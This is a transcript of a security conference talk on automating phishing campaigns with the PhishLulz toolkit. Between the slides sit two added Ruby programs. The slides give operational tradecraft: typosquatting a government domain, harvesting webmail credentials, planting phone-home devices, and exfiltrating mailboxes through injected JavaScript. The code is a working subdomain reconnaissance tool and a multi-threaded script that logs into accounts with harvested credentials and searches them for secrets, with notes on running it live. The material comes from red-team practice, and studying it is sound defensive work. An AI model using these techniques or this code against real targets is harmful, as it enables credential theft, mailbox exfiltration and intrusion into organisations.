Practical Phishing Automation with PhishLulz - Kiwicon X
TRANSCRIPT
Practical Phishing Automation with PhishLulz
antisnatchor
Outline
● Why Phishing?
● Phishing in real-life
● PhishLulz to the rescue
● FindResources.rb
● MailBoxBug.rb
● Outro
whoami
● Pentesting, Vuln Research, Coding
● BeEF core dev team
● Browser Hacker’s Handbook co-author (read it while it’s hot!)
● Senior Security Consultant, FortConsult (NCC)
Why Phishing?
● To exploit the ignorance of the masses
– Or the ignorance of specific persons you want to target
● A few good pretexts, a bunch of typoed domains and a couple of pre-planned campaign scenarios can take you very far with most targets
● One victim being tricked into executing your payloads is (usually) enough to start pivoting & user impersonation activities
● Client-side 0days are quite expensive
Why Phishing?
● Too fun owning people in 2016 STILL with:
– (Open) Office Macros
– .exe/.pkg files disguised as something else
– Browser extensions
– Other tricks (HTAs, Windows Screen Saver files, …)
● Active Directory is the “new” Java:
– STEAL ONCE, AUTH EVERYWHERE
● 2FA is still mostly a myth
– IF used, it relies mostly on SMSs which is fucked (see mobile phone or SS7 exploits)
Why Phishing?
● How many companies are able to spot phishing campaigns?
– If spotted, do they know how to react, check who was pwned or what info was leaked out?
– If the malicious email and domain are identified, after how many hours will connectivity to the domain be blocked?
– If you phish just 1 target in the HR dept. with a fake CV pretext, what is the likelihood it will be detected?
Phishing in real-life
● Most of the time it is easy, but depending on the target’s security maturity level it can be stressful
● Even more powerful when combined with red teaming
– Physically walking inside a company placing Raspberries which phone home via LTE
● so you have both wired/wifi available and you don’t need to care about egress filters
● Feed the Raspberry’s scripts with credentials harvested via phishing (ARP Spoofing and LLMNR Spoofing needed only if collected creds don’t take you too far)
Phishing in real-life
● Phishing, like red teaming, is opportunistic
● You want to first target the target’s departments which are in theory easier to pwn (HR, Finance, Marketing)
– Perform as much OSINT & active fingerprinting as possible
● You don’t want to directly target security-savvy people who could raise alarm bells
– Arrive at them via other channels, i.e. via user impersonation of a trusted victim’s contact
– Do not engage at the first contact (i.e. do not add malicious attachments to the first email, build trust first)
Phishing in real-life
Target: www.lulz.wa.gov.au (GMT+8)
● Discovered during reconnaissance:
– webmail.lulz.wa.gov.au: Outlook Web Access
– vpn1.lulz.wa.gov.au: Check Point SSL VPN
● OWA 2011 template
● Registered lulz-wa-gov-au.com (note: dashes instead of dots)
PhishLulz to the rescue
● When doing Phishing:
– Every time it’s a different story
– Configuration overhead sometimes is a killer
– You can identify repeatable patterns
– Good timings are key
– You need as much automation as possible
– Speed is key once you have access to the victim’s assets
PhishLulz to the rescue
● Ideally you would like to automate:
– Domain registration & DNS zone file config (SPF/DKIM)
– SMTP server configuration
– VirtualHost-like (including SSL) config
– Correlate unique clicks with email, geolocation and all the fingerprinting by BeEF
– Database of phishing templates, re-usable and effective
● With PhishLulz 95% of the above is automated
PhishLulz to the rescue
● Amazon EC2 image pre-configured with:
– PhishingFrenzy – phishing framework in Rails
– BeEF – no intro needed ;-)
● Set of Ruby||GTFO scripts to make your life easier when doing Phishing
PhishLulz to the rescue
● Video demo…
PhishLulz to the rescue
● PhishLulz comes with a bunch of other tools
– Subdomain enumeration and fingerprinting
– Extract HTML content from .eml file
– Automatically verify webmail login and extrude emails matching patterns
find_resources.rb – multi-threaded subdomain discovery
● Your target has 5 different FQDNs & you need to discover interesting subdomains to phish
● For each FQDN, iterate through a list of 2000 subdomains checking if they resolve, for instance:
– Webmail.target1.com
– Citrix.target2.com
– Vpn.target1.com
find_resources.rb
● Multi-threaded, so you can scan multiple domains at once.
● If a subdomain resolves, it tries to connect to ports 80/443 and gets the page title/Server header
● Outputs a .csv file with discovered stuff
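The discovery loop described on these slides, as an added example that is not the project's find_resources.rb: candidate generation (wordlist × FQDN), DNS resolution, an HTTP probe of 80/443 for the Server header and the page title, a fixed-size worker pool and CSV output. The resolver and the prober are injected callables, so the same code runs against live DNS/HTTP (the default `resolve_host`/`probe_http`) or against the constructed fixtures at the bottom; those hostnames, addresses and responses are invented for an offline run and are not real targets.

```ruby
require 'resolv'
require 'net/http'
require 'openssl'
require 'csv'

# Build every candidate hostname: each wordlist entry prefixed to each target FQDN.
def candidates(domains, wordlist)
  domains.product(wordlist).map { |domain, word| "#{word}.#{domain}" }
end

# Live resolver: A/AAAA addresses for host, or nil when the name does not resolve.
def resolve_host(host)
  addrs = Resolv::DNS.open { |dns| dns.getaddresses(host) }.map(&:to_s)
  addrs.empty? ? nil : addrs
rescue Resolv::ResolvError, Resolv::ResolvTimeout
  nil
end

# Live HTTP probe: GET / on one port, returning status, Server header and <title>.
def probe_http(host, port)
  http = Net::HTTP.new(host, port)
  http.open_timeout = 4
  http.read_timeout = 6
  if port == 443
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE # fingerprinting only; self-signed certs are common
  end
  res = http.request(Net::HTTP::Get.new('/'))
  title = res.body.to_s[%r{<title[^>]*>(.*?)</title>}im, 1]
  { port: port, status: res.code, server: res['Server'], title: title&.strip&.gsub(/\s+/, ' ') }
rescue StandardError, Timeout::Error
  nil # closed port, TLS failure, timeout: nothing to record for this port
end

# Resolve one candidate and, if it resolves, probe 80 and 443.
def fingerprint(host, resolver:, prober:)
  addrs = resolver.call(host)
  return nil unless addrs
  services = [80, 443].map { |port| prober.call(host, port) }.compact
  { host: host, addrs: addrs, services: services }
end

# Multi-threaded discovery over all candidates. resolver/prober are injectable so the
# same code runs against live DNS/HTTP or against the constructed fixtures below.
def discover(domains, wordlist, threads: 20, resolver: method(:resolve_host), prober: method(:probe_http))
  work = Queue.new
  candidates(domains, wordlist).each { |h| work << h }
  threads.times { work << :done } # one sentinel per worker
  found = Queue.new
  Array.new(threads) do
    Thread.new do
      while (host = work.pop) != :done
        r = fingerprint(host, resolver: resolver, prober: prober)
        found << r if r
      end
    end
  end.each(&:join)
  rows = []
  rows << found.pop until found.empty?
  rows.sort_by { |r| r[:host] }
end

# One CSV row per (host, port) so the output greps well for "Outlook", "Citrix", "VPN".
def to_csv(rows)
  CSV.generate do |csv|
    csv << %w[host addrs port status server title]
    rows.each do |r|
      base = [r[:host], r[:addrs].join(' ')]
      if r[:services].empty?
        csv << base + [nil, nil, nil, nil]
      else
        r[:services].each { |s| csv << base + [s[:port], s[:status], s[:server], s[:title]] }
      end
    end
  end
end

# Constructed fixtures standing in for live DNS and HTTP (invented hosts, not real targets).
FAKE_DNS = {
  'webmail.target1.com' => ['203.0.113.10'],
  'vpn.target1.com'     => ['203.0.113.11'],
  'citrix.target2.com'  => ['198.51.100.20'],
}.freeze
FAKE_HTTP = {
  ['webmail.target1.com', 443] => { port: 443, status: '200', server: 'Microsoft-IIS/8.5', title: 'Outlook Web App' },
  ['vpn.target1.com', 443]     => { port: 443, status: '200', server: nil, title: 'SSL VPN Portal' },
  ['citrix.target2.com', 80]   => { port: 80, status: '302', server: 'Citrix', title: nil },
}.freeze
FAKE_RESOLVER = ->(host) { FAKE_DNS[host] }
FAKE_PROBER   = ->(host, port) { FAKE_HTTP[[host, port]] }

if __FILE__ == $0
  rows = discover(%w[target1.com target2.com], %w[webmail vpn citrix intranet owa],
                  threads: 4, resolver: FAKE_RESOLVER, prober: FAKE_PROBER)
  puts to_csv(rows)
end
```

For a live run, drop the `resolver:`/`prober:` arguments so the defaults hit real DNS and HTTP, feed a 2000-entry wordlist, and raise `threads:` to taste; the sentinel-per-worker queue means the pool drains cleanly without busy-waiting. `VERIFY_NONE` is deliberate here: the goal is to read a banner from a self-signed Citrix or VPN portal, not to trust it.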
MailBoxBug.rb
● When doing webmail credential harvesting, you usually end up with tens of valid credentials in a matter of minutes
● You need to be quick searching for low hanging fruits in each mailbox of your victims
– Good luck doing that manually with 50 credentials
– What if after 2 hours the target realizes the phish, forcing a password change on all those 50 users that clicked?
● Remember: SPEED IS KEY
MailBoxBug.rb
● Automated & multi-threaded webmail data extrusion
● Agnostic to webmail type, doesn’t rely on APIs
● Written for automatic search & extrusion of data from webmails (follow-up of credential harvesting campaigns)
● Afaik there is no public tool for this
– Enabling POP/IMAP → fetchmail is noisy and sometimes not supported (see Outlook Live)
– Relying on webmail RESTful APIs (if any) → usually requires SSO
– I needed something I could easily enhance adding more webmails support, without re-inventing the wheel for each webmail type
MailBoxBug.rb
● Tested various approaches to support outlook.live.com
– Burp traffic analysis, re-implementing the raw request flow and managing cookies with plain Ruby net/http/nokogiri
● Was working great but post-login you need JavaScript → NO GO
– Phantom/CasperJS to have JS support and instrument a headless browser
● Automated login worked, but post-login what? Clicking on elements without ID/Names is painful, XPATH is fucked up → NO GO
MailBoxBug.rb
● Watir (a WebDriver Ruby wrapper) & JS injection
– Uses Watir to instrument a browser (Firefox/Chrome)
– If login is successful, injects JavaScript code that re-implements via XMLHttpRequest the flow needed to search and retrieve emails matching patterns
● Why JavaScript injection?
– Easy to analyze webmail search/retrieve functionality (especially if it returns JSON) with Burp then re-implement
– You don’t need to manually take care of cookies/auth
– The whole approach becomes webmail agnostic as soon as you implement the right XHR calls
MailBoxBug.rb
● Data extrusion exploits the Same Origin Policy
– The JS injected code extrudes emails/attachments via cross-origin POST XHR to an https handler (Mixed Content…)
– As discussed in the Browser Hacker’s Handbook, the SOP DOES NOT prevent you from sending requests cross-origin
● We don’t care about reading responses, like in XSRF scenarios
MailBoxBug.rb
● Currently supports only outlook.live.com
– Common scenario if the customer uses Microsoft stuff without hosting OWA internally
● Need Gmail or custom webmail support?
– Just analyze traffic with Burp and re-implement with XHR
– Quickly test it via Firebug or JS Console
– Once it’s tested and stable, plug it in MailBoxBug
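The orchestration side of the approach on the MailBoxBug slides (tens of harvested credentials, one driver per webmail type, speed before the target resets passwords), as an added example; this is not MailBoxBug's code. `FakeWebmail`, its accounts and messages, the `LOW_HANGING` keyword pattern and the timeout value are all constructed for the example. A real driver would wrap a Watir-instrumented browser and perform `login`/`search` through the XHR code injected for that webmail instead of an in-memory hash; that is the only piece that changes per webmail, while `triage_account`/`triage_all` stay the same.

```ruby
require 'timeout'

# Constructed in-memory webmail standing in for a real driver. A real driver wraps a
# Watir-controlled browser and does login/search via the JS injected for that webmail;
# only these two methods need reimplementing to add a webmail type.
class FakeWebmail
  ACCOUNTS = {
    'alice' => { password: 'Winter2016!', mail: [
      { id: 1, subject: 'VPN access details', body: 'your token seed is attached' },
      { id: 2, subject: 'Lunch?',             body: 'pizza at 12' } ] },
    'bob'   => { password: 'Passw0rd', mail: [
      { id: 3, subject: 'Invoice 4471',       body: 'payment portal password: inv-2016' } ] },
    'carol' => { password: 'reset-after-phish', mail: [] },
  }.freeze

  # Returns a session on success, nil on bad credentials (e.g. password already reset).
  def login(user, password)
    acct = ACCOUNTS[user]
    acct && acct[:password] == password ? { user: user, mail: acct[:mail] } : nil
  end

  # Messages whose subject or body match, as the XHR-backed search would return them.
  def search(session, pattern)
    session[:mail].select { |m| pattern.match?(m[:subject]) || pattern.match?(m[:body]) }
  end
end

# Hypothetical low-hanging-fruit keywords; tune per engagement.
LOW_HANGING = /password|vpn|citrix|invoice|token|credential/i

# One credential pair -> one result record, bounded by a per-account timeout so a
# single hung login cannot stall the whole run.
def triage_account(driver, user, password, pattern: LOW_HANGING, timeout: 20)
  Timeout.timeout(timeout) do
    session = driver.login(user, password)
    if session
      hits = driver.search(session, pattern)
      { user: user, status: :ok, hits: hits.map { |m| m[:subject] } }
    else
      { user: user, status: :login_failed, hits: [] }
    end
  end
rescue Timeout::Error
  { user: user, status: :timeout, hits: [] }
end

# Process harvested credentials in parallel batches: `threads` logins in flight at once,
# results returned in the same order as the input list.
def triage_all(driver, creds, threads: 10, **opts)
  creds.each_slice(threads).flat_map do |batch|
    batch.map { |user, pw| Thread.new { triage_account(driver, user, pw, **opts) } }.map(&:value)
  end
end

if __FILE__ == $0
  # Constructed harvest: carol's password was already changed when we got to it.
  harvested = [['alice', 'Winter2016!'], ['bob', 'Passw0rd'], ['carol', 'Autumn2016!']]
  triage_all(FakeWebmail.new, harvested, threads: 3).each do |r|
    puts "#{r[:user]}: #{r[:status]} #{r[:hits].inspect}"
  end
end
```

The `:login_failed` and `:timeout` statuses are what you want to see at a glance when the target starts resetting passwords mid-campaign: they tell you which accounts are already burned without anyone reading 50 browser windows.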
● Video demo…
Outro
● PhishLulz, MailBoxBug and other tools are now public on GitHub, have fun :-)
https://github.com/antisnatchor/phishlulz
Hope you enjoyed!